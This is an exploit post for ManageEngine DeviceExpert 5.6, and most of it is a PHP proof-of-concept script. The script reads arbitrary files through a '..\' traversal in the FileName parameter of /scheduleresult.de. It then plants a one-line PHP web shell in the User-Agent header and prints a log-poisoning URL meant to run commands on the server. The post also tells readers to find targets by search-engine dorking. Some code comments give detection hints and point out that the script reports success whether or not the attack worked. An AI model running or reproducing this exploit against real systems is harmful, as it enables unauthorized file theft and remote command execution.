ManageEngine DeviceExpert 5.6 Traversal / Code Execution
=============================================================================================================================================
| # Title ManageEngine DeviceExpert 5.6 Traversal / Code Execution
=============================================================================================================================================
| # Title : ManageEngine DeviceExpert 5.6 ScheduleResultViewer FileName PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://download.manageengine.com/ |
=============================================================================================================================================
POC :
[+] Dorking in Google or another search engine.
[+] Code Description: The web shell injection step works only if the target has an LFI (Local File Inclusion) vulnerability with code execution capability, or an RFI (Remote File Inclusion) vulnerability,
or if we can write to a path that the web server can execute,
such as the uploads or webroot folder on the server. The script does not check any of these preconditions.
( https://packetstorm.news/files/id/181161/ )
[+] save code as poc.php.
[+] Set Target : line 81
[+] Usage : php poc.php
[+] PayLoad :
<?php
/**
 * Proof-of-concept client for the DeviceExpert `/scheduleresult.de` endpoint.
 *
 * run() requests the endpoint once without parameters, then requests it again
 * with a `FileName` query value built from ten `..\` segments followed by the
 * configured file path, and writes a non-empty 200 response into the script's
 * own directory. injectWebShell() sends one request whose User-Agent header
 * carries PHP source and prints a follow-up URL. It never requests that URL,
 * so its "[SUCCESS]" line only means the endpoint answered 200; nothing in
 * this class shows the header value being executed by the server.
 *
 * Defender notes: this traffic shows up in web-server or proxy logs as requests
 * to `/scheduleresult.de` whose `FileName` value contains `..\` or `../`
 * sequences, and as User-Agent values containing `<?php`. Limiting who can
 * reach the management port (6060 is the default used here) reduces exposure;
 * the page names no fixed release, so check the vendor's advisories for one.
 */
class ManageEngineScanner
{
    /** @var mixed Host name or IP address placed in the request URL. */
    private $host;

    /** @var mixed Port placed in the request URL. */
    private $port;

    /** @var mixed Truthy selects the https scheme, falsy selects http. */
    private $ssl;

    /** @var mixed Path appended after the traversal prefix in run(). */
    private $filepath;

    /**
     * Stores the connection settings; no request is made here.
     *
     * @param mixed $host     Host name or IP address of the server to query.
     * @param mixed $port     Port of the web interface (default 6060).
     * @param mixed $ssl      Whether to build https URLs (default true).
     * @param mixed $filepath Path requested through `FileName` (default windows\win.ini).
     */
    public function __construct($host, $port = 6060, $ssl = true, $filepath = 'windows\\win.ini') {
        $this->filepath = $filepath;
        $this->ssl = $ssl;
        $this->port = $port;
        $this->host = $host;
    }

    /**
     * Performs one GET request against the configured host and port.
     *
     * @param mixed $uri     Path and query string, appended to the URL unencoded.
     * @param mixed $headers Extra request header lines handed to cURL.
     *
     * @return array Two elements: the HTTP status code reported by cURL and
     *               whatever curl_exec() returned.
     */
    private function sendRequest($uri, $headers = []) {
        $scheme = 'http';
        if ($this->ssl) {
            $scheme = 'https';
        }
        $endpoint = $scheme . '://' . $this->host . ':' . $this->port . $uri;

        $handle = curl_init();
        $options = [
            CURLOPT_URL => $endpoint,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_TIMEOUT => 25,
            CURLOPT_HTTPHEADER => $headers,
        ];
        // Options are applied one at a time, in this order.
        foreach ($options as $option => $value) {
            curl_setopt($handle, $option, $value);
        }

        $body = curl_exec($handle);
        $status = curl_getinfo($handle, CURLINFO_HTTP_CODE);
        curl_close($handle);

        return [$status, $body];
    }

    /**
     * Checks the endpoint, then issues the `FileName` traversal request and
     * saves a non-empty 200 response locally.
     *
     * Any status other than 200 on the first request is reported as "not
     * ManageEngine DeviceExpert" and ends the run. The second request is
     * where `..\` sequences appear in the query string.
     *
     * @return void
     */
    public function run() {
        $prefix = str_repeat("..\\", 10);

        [$status] = $this->sendRequest("/scheduleresult.de");
        if ($status !== 200) {
            echo "[ERROR] Target is not ManageEngine DeviceExpert\n";
            return;
        }

        [$status, $body] = $this->sendRequest("/scheduleresult.de/?FileName={$prefix}{$this->filepath}");

        if ($status === 404) {
            echo "[ERROR] {$this->host}:{$this->port} - file not found\n";
            return;
        }
        if ($status !== 200) {
            echo "[ERROR] Unable to communicate with {$this->host}:{$this->port}\n";
            return;
        }

        // The success line is printed on the status code alone, before the body is inspected.
        echo "[SUCCESS] {$this->host}:{$this->port} returns: $status\n";
        if (empty($body)) {
            echo "[ERROR] {$this->host}:{$this->port} - no file downloaded (empty)\n";
            return;
        }
        $this->saveFile($body);
    }

    /**
     * Writes the response body next to this script, named after the last
     * component of the configured file path.
     *
     * The result of file_put_contents() is not checked, so the success line
     * is printed whether or not the write worked.
     *
     * @param mixed $content Response body to store.
     *
     * @return void
     */
    private function saveFile($content) {
        $destination = __DIR__ . '/' . basename($this->filepath);
        file_put_contents($destination, $content);
        echo "[SUCCESS] File saved in: $destination\n";
    }

    /**
     * Sends one request whose User-Agent header contains PHP source, then
     * prints a follow-up URL.
     *
     * The printed URL is a fixed template (plain http, no port, a Linux Apache
     * log path); it is only echoed, never requested. A 200 from the endpoint
     * is the sole condition for the "[SUCCESS]" line, so that line is not
     * evidence that anything was written or executed on the server.
     *
     * @return void
     */
    public function injectWebShell() {
        $webshell = "<?php system(\$_GET['cmd']); ?>";
        [$status] = $this->sendRequest("/scheduleresult.de", ["User-Agent: " . $webshell]);

        if ($status !== 200) {
            echo "[ERROR] Web Shell injection failed!\n";
            return;
        }

        echo "[SUCCESS] Web Shell injected via User-Agent!\n";
        echo "Access it at: http://{$this->host}/scheduleresult.de/?FileName=../../../../../../var/log/apache2/access.log&cmd=id\n";
    }
}
// 'target_ip_here' is a placeholder; port 6060, https and windows\win.ini come from the constructor defaults.
$poc = new ManageEngineScanner('target_ip_here');
// Endpoint check followed by the FileName traversal request.
$poc->run();
// Runs unconditionally, whatever run() reported above.
$poc->injectWebShell();
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================